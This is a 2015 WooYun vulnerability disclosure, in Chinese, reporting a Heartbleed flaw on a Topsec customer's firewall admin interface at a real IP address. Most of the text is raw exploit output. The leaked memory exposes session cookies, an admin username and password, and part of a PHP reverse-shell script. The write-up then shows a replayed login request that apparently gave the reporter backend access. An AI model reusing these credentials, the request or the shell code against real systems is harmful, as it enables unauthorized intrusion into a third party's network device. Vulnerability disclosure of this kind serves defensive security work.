当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116653

漏洞标题:天融信某客户一处心脏滴血(已入后台)

相关厂商:天融信

漏洞作者:

提交时间:2015-05-28 11:17

修复时间:2015-07-12 15:58

公开时间:2015-07-12 15:58

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-28: 细节已通知厂商并且等待厂商处理中
2015-05-28: 厂商已经确认,细节仅向厂商公开
2015-06-07: 细节向核心白帽子及相关领域专家公开
2015-06-17: 细节向普通白帽子公开
2015-06-27: 细节向实习白帽子公开
2015-07-12: 细节向公众公开

简要描述:

*

详细说明:

地址:https://125.76.228.15/

125.76.228.15:443 - Sending Heartbeat...
[*] 125.76.228.15:443 - Heartbeat response, 65535 bytes
[+] 125.76.228.15:443 - Heartbeat response with leak
[*] 125.76.228.15:443 - Printable info leaked: Uey<^!(udm5\^\f"!98532ED/A Firefox/34.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: https://125.76.228.15/cgi/maincgi.cgi?Url=MainFrameCookie: session_id=77835153; PHPSESSID=ndvi63t6irlk8hg64gaq1nhiq0; ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229123586b95f93d0d60332a5ee6d13e2c%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A11%3A%221.85.49.230%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A72%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+rv%3A34.0%29+Gecko%2F20100101+Firefox%2F34.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1432775396%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22secucode%22%3Bs%3A4%3A%22rdgg%22%3B%7D659e390c04a3c26fb5932eb9f050d6e2; login=falseConnection: keep-alive\]/\dFw6P7DConnection: keep-aliveuWRjv|`jWur&passwd=0F29l%3FTfW&loginSubmitIpt=%B5%C7%C2%BC)[Cb9gV|v&C%22dst_lv%22%3A%222%22%2C%22org_type%22%3A%220%22%2C%22is_group%22%3A%220%22%2C%22org_parent%22%3A%220%22%2C%22accKey%22%3A%2214289827902849552c8c0645ce0%22%2C%22login_ip%22%3A%221.85.49.230%22%2C%22user_type%22%3A%220%22%2C%22is_logined%22%3A1%7D; operation_status=1428982791Connection: keep-aliveCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 61username=super&passwd=0F29l%3FTfW&loginSubmitIpt=%B5%C7%C2%BCF2OpaYO7dir("/");umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {printit("$errstr ($errno)");exit(1);}$descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {printit("ERROR: Can't spawn shell");exit(1);}stream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);while (1) {if (feof($sock)) {printit("ERROR: Shell connection terminated");break;}if (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);if (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ");$input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");fwrite($pipes[0], $input);}if (in_array($pipes[1], $read_a)) {if ($debug) printit("STDOUT READ");$input = fread($pipes[1], $chunk_size);if ($debug) printit("STDOUT: $input");fwrite($sock, $input);}if (in_array($pipes[2], $read_a)) {if ($debug) printit("STDERR READ");$input = fread($pipes[2], $chunk_size);if ($debug) printit("STDERR: $input");fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);function printit ($string) {if (!$daemon) {print "$string";}}exit(1);?>9+@zE:@@Da=I[,|yQ^* dJypY#0H/< Hn>7yNS'a\`D=v^<NQ6&.V8#PPkFXuel/9pT:s>^kI ZWQNoH|nL1Vv'UPK?X"wbaAa3{x~#@AY/#Gt;j*yjlG;cvE(LW{|fFm~vG^$z#'Si00UEngineering Department10UTOPSEC PRODUCTS1 0*Hp_m@topsec.com.cn00*H0:A_||C(@ZWa_bWy<$rHshRq/^a#V"<c8/7Ul$`Q3S1j@3H?400U00U^BVBS$+"0U#0#gvsvBWh010UCN10UBEIJING10UBEIJING1=0;U4Beijing Topsec Network Security Technology Co., Ltd.10UEngineering Department10UTOPSEC PRODUCTS1 0*Hp_m@topsec.com.cn0U0U%0+0U0p_m@topsec.com.cn0`HB@0`HBTOPSEC0 `HBwebui certificate0*HaFX:[G<>n=E|'3gB+%0yL-3:>C70 ]@%70?lWvrCr8Pc0y^=V`u_^rn75@ajbc6$%Tz*LWy)!K+`l]c:"{-u8]Th#n4to5>TQ~u:F0q#w+J*@QH>*$`!nh+v+Mxm\NB&_I2fWC]iFYnt,4i{{a@`.pL1HCqe0<30&C9sq@Cd!Oy$MAe?hwWPijJZ*B$)b"o&qrW@XDs!0{x-5^nFb,$s\bjCw_kO9lybhA_-6q<^JNe;>C]A;wwlZ~kr]tH.jV*I2KpV*Lu!Ttu~g2Edx[T +4&`6{~:WlRFeR SqC=Bq.G6Sr"gts4>gd~ Z5p7<t0FW1p>\C\BPq0\N-R-j.2ciUhS58XzQ\% ,<WGOt=[2s4wSt30|&3mGFQJ@pO{FkSS8>:!x[fcdY?*IK99ucBqVp6>7LbDm3#)X`^8RvQ.kd4oKFU*gngvv,49~Flq"S77Bv86@5C~}4|^fG-wz)FWO*SCO!.L<,7ocrlFDz>AS:|oIV2V+_2![?2`:(J`b&Ll!@L-LOXUq8gcF5#P,^)mPS}z]#(^`iRC9!RI;$D3ZV1.d$i/ZY;c,@X`mktM4"pI=rQa[W8^;"s(Vfmr2DaSQ*q[DVQWr>u$Ugmoj}@+j/)#KdeU%^X(1x^H5Fo'c\'dYu:@L9"}Rb[zhe(-8PwoM{Q-}2Q:GoG#C]OH_Nf)*1FY=ovn{[G@or-)>MreH:_Ex0G&'E?SS2:nwOiL'M^<~UU*caM0z@zB9W=0DKS{che&-VO,+=f9UqK=A/;T?mT&a4QA2XX_+XA\ms 5r\N.G$!./P$bQIsL*TRynpbR\'mG+N_9rT2S1="03WHMH;xFCa'+l!p|odZ=KVqS7VF"V&OTx0E?hoU}sTAin?NM.I,&SQVcRfa'^XvT?SOu{8+l9Y_CcukhRd+wvjP6]znzvl|USXt+=`37K}'DjtYlWXLJ{S!cReQHWNb\P>#ly9rSjDe39.9.kMviS7H5Qwm=+=#)@3"'>"*$)Oge@.~e$MRpm-VgJW4%YMSyNES,fx_,]Yw:x_G;E>&G`4/f}\32l:sn,Q0Ar-IR T4[}x%Un4y>oP}KE+(11v:Be/W)PO:n)0@FJjlP5TDTTr).CP9 0~username=super&passwd=0F29l%3FTfW&loginSubmitIpt=%B5%C7%C2%BC2%E2+pto_tex=&arp_det_btn=+%CC%BD%B2%E2+rans_sel=&nat_dsttrans_sel=192.168.2.250&nat_dstports_sel=rysnc-873&ffffixbug=&natpolicy_desp_tex=&acl_idnum_hid=8273&nat_page_number=1&nat_edit_sub=++%C8%B7+%B6%A8+B6%A8+6%A8++8++%C8%B7+%B6%A8+00&sys_quota_tcp=0&sys_quota_udp=0&sys_quota_others=0&icmp_redirect_sel=off&tcp_reset_sel=off&sys_packet_sel=off&sys_session_integrity_sel=on&syn_reset_sel=off&network_mpls_handle=off&network_cdp_set=on&network_intellective_route_set=off&sys_extip_tex=&arp_qus_rad=off&sys_setting_but=+%D3%A6+%D3%C3+vrid=0&network_interface_arp=0&network_interface_mss_sel=off&network_interface_revpath=off&network_interface_hametric=0&srcSelected=eth1&network_interface_name=eth1&network_interface_slave=0)Fd/G`z+<Nau9Vt(?Wp;L^q-If"8Og+K\n"=Yv2H_w;[l~2Mi-BXo,Kk|(B]y)=Rh<[{8Rm&9Mbx.Lk/Hb}$6I]r!>\{'?Xr#4FYm1Nl 7Oh3DVi}%A^|0G_x#CTfy5Qn*@Wo3Sdv*Ea~%:Pg$Cct :Uq!5J`w4Ss0Je1EZp&Dc'@Zu.AUj6Ts7Pj,>Qez)Fd/G`z+<Nau9Vt(?Wp;L^q-If"8Og+K\n"=Yv2H_w;[l~2Mi-BXo,Kk|(B]y)=Rh<[{8Rm&9Mbx.Lk/Hb}$6I]r!>\{'?Xr#4FYm1Nl 7Oh3DVi}%A^|0G_x#CTfy5Qn*@Wo3Sdvy@>b@>b1(@>b`(@>b`>b@>b!>\{'?Xr#4FYm1Nl 7Oh3DVi}%A^|@>_P@>_PQMR<]G3VEWL{c L+@G.?e>o Dc@ZpQfU:s~4ti/^uwU L+@G.?e>o 'YNn^c}TORH @>b8@>b8<@0@>_`@>_`pH(WW@+E1@>_x-I@>_`@>_`Vp!0@+FT@8#7@>b@>b&8K_t#@^})AZt%6H[o3Pn"9Qj5FXk'C`~2Iahhz&@[w';Pf}:Yy6Pk$7K`v,Ji-F`{"4G[p<Zy@>b@>b!7Nf*J[m!<Xu1G^v:Zk}1Lh,AWn+Jj{'A\x(<Qg~;Zz7Ql%8Law-Kj.Ga|#5H\q =[z&>Wq"3EXl0Mk6Ng2CUh|$@]{/F^w"BSex4Pm)?Vn2Rcu)D`}$9Of~#Bbs9Tp 4I_v3Rr/Id0DYo%Cb&?Yt-@Ti5Sr6Oi+=Pdy(Ec.F_y*;M`t8Us'>Vo:K]p,He!7Nf*J[m!<Xu1G^v:Zk}1Lh,AWn+Jj{'A\x(<Qg~;Zz7Ql%8Law-Kj.Ga|#5H\q =[z&>Wq"3EXl0Mk6Ng2CUh|$@]{/F^w"BSex4Pm)?Vn2Rcu)D`}$9Of~#Bbs9Tp 4I_v3Rr/Id0DYo%Cb&?Yt-@Ti5Sr6Oi+=Pdy(Ec.F_y*;M`t8Us'>Vo:K]p,He@>a@>a@>a`@>a`$Cct :Uq!5J`w4Ss0Je1EZp&Dc'@Zuhh6Qm1F\s0Oo,Fa}-AVl"@_#<Vq*=Qf|2Po3hL^q-If"8Og+K\n"=Yv2H_w;[l~2Mi-BXo,Kk1@>`@>`<@HVl@>`@>`@>` _>_P@>_Pj6Yi !:{@>_XX"n#>_@>_w&@6!u 0w((&|4PT4|ll|nLp&|PT4|ll\|o\oLq&|pqT4DHE-RSA-AES128-SHADHE-RSA-AES128-SHA128128LT\maincgicgiHTTPSonmod_ssl/2.8.25mod_ssl/2.8.25SSL_VERSION_INTERFACEmod_ssl/2.8.25OpenSSL/1.0.1c10 May 2012OpenSSL/1.0.1cSSL_VERSION_LIBRARYOpenSSL/1.0.1cTLSv1.2SSL_PROTOCOLTLSv1.2DHE-RSA-AES128-SHADHE-RSA-AES128-SHASSL_CIPHERDHE-RSA-AES128-SHAfalsefalseSSL_CIPHER_EXPORTfalse128128ateSSL_CIPHER_USEKEYSIZE128?128128?SSL_CIPHER_ALGKEYSIZE128?NONESSL_CLIENT_VERIFYNONE33SSL_SERVER_M_VERSION3050505SSL_SERVER_M_SERIAL05May 23 10:48:00 2012 GMTMay 23 10:48:00 2012 GMTMay 23 10:48:00 2012 GMTSSL_SERVER_V_STARTMay 23 10:48:00 2012 GMTMay 23 10:48:00 2042 GMTMay 23 10:48:00 2042 GMTMay 23 10:48:00 2042 GMTSSL_SERVER_V_ENDMay 23 10:48:00 2042 GMT/C=CN/ST=BEIJING/L=BEIJING/O=Beijing Topsec Network Security Technology Co., Ltd./OU=Engineering Department/CN=TOPSEC PRODUCTS/emailAddress=p_m@topsec.com.cn/C=CN/ST=BEIJING/L=BEIJING/O=Beijing Topsec Network Security Technology Co., Ltd./OU=Engineering Department/CN=TOPSEC PRODUCTS/emailAddress=p_m@topsec.com.cnSSL_SERVER_S_DN/C=CN/ST=BEIJING/L=BEIJING/O=Beijing Topsec Network Security Technology Co., Ltd./OU=Engineering Department/CN=TOPSEC PRODUCTS/emailAddress=p_m@topsec.com.cnCNCNSSL_SERVER_S_DN_CCNBEIJINGBEIJINGSSL_SERVER_S_DN_STBEIJINGBEIJINGBEIJINGSSL_SERVER_S_DN_LBEIJINGBeijing Topsec Network Security Technology Co., Ltd.Beijing Topsec Network Security Technology Co., Ltd.SSL_SERVER_S_DN_OBeijing Topsec Network Security Technology Co., Ltd.Engineering DepartmentEngineering DepartmentSSL_SERVER_S_DN_OUEngineering DepartmentTOPSEC PRODUCTSTOPSEC PRODUCTSSSL_SERVER_S_DN_CNTOPSEC PRODUCTSp_m@topsec.com.cnp_m@topsec.com.cnSSL_SERVER_S_DN_Emailp_m@topsec.com.cn/C=CN/ST=BEIJING/L=BEIJING/O=Beijing Topsec Network Security Technology Co., Ltd./OU=Engineering Department/CN=TOPSEC PRODUCTS/emailAddress=p_m@topsec.com.cn/C=CN/ST=BEIJING/L=BEIJING/O=Beijing Topsec Network Security Technology Co., Ltd./OU=Engineering Department/CN=TOPSEC PRODUCTS/emailAddress=p_m@topsec.com.cnSSL_SERVER_I_DN/C=CN/ST=BEIJING/L=BEIJING/O=Beijing Topsec Network Security Technology Co., Ltd./OU=Engineering Department/CN=TOPSEC PRODUCTS/emailAddress=p_m@topsec.com.cnCNCNSSL_SERVER_I_DN_CCNBEIJINGBEIJINGSSL_SERVER_I_DN_STBEIJINGBEIJINGBEIJINGSSL_SERVER_I_DN_LBEIJINGBeijing Topsec Network Security Technology Co., Ltd.Beijing Topsec Network Security Technology Co., Ltd.SSL_SERVER_I_DN_OBeijing Topsec Network Security Technology Co., Ltd.Engineering DepartmentEngineering DepartmentSSL_SERVER_I_DN_OUEngineering DepartmentTOPSEC PRODUCTSTOPSEC PRODUCTSSSL_SERVER_I_DN_CNTOPSEC PRODUCTSp_m@topsec.com.cnp_m@topsec.com.cnSSL_SERVER_I_DN_Emailp_m@topsec.com.cnrsaEncryptionrsaEncryptionSSL_SERVER_A_KEYrsaEncryptionsha1WithRSAEncryptionsha1WithRSAEncryptionSSL_SERVER_A_SIGsha1WithRSAEncryptionA4476048E4CBBC9325D42DF88CE3103CF81793E6121A18B960F8FD53428FCB4DA4476048E4CBBC9325D42DF88CE3103CF81793E6121A18B960F8FD53428FCB4DSSL_SESSION_IDA4476048E4CBBC9325D42DF88CE3103CF81793E6121A18B960F8FD53428FCB4D!$4LUdt 8DiTidxHTTP_ACCEPTHTTP_ACCEPT_ENCODINGHTTP_ACCEPT_LANGUAGEHTTP_CONNECTIONHTTP_COOKIEHTTP_HOSTHTTP_REFERERHTTP_USER_AGENT/tos/bin:/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin:/tos/binweb.tos443
[*] Scanned 1 of 1 hosts (100% complete)


抓到账号密码
username=super&passwd=0F29l%3FTfW
解密尝试登陆失败。
https://125.76.228.15/cgi/maincgi.cgi?Url=MainFrame
构造cookie依旧失败。
于是抓包改包数据

POST /cgi/maincgi.cgi?Url=Index HTTP/1.1
Host: 125.76.228.15
Connection: keep-alive
Content-Length: 52
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://125.76.228.15
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: https://125.76.228.15/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: session_id=; ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%226fcc1566f3ffa084a45203012e026fce%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22222.82.43.125%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+6.3%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F35.0.1916.153+Safari%2F537.36+SE+2.X+Met%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1432781299%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22secucode%22%3Bs%3A4%3A%22vvtf%22%3B%7Dce17c1307c85ce1cb5c5ac0f7ee84881
username=super&passwd=0F29l%3FTfW&loginSubmitIpt=%B5%C7%C2%BC


登陆成功

a.jpg

漏洞证明:

RT

修复方案:

*

版权声明:转载请注明来源 @乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2015-05-28 15:57

厂商回复:

感谢您的提交。

最新状态:

暂无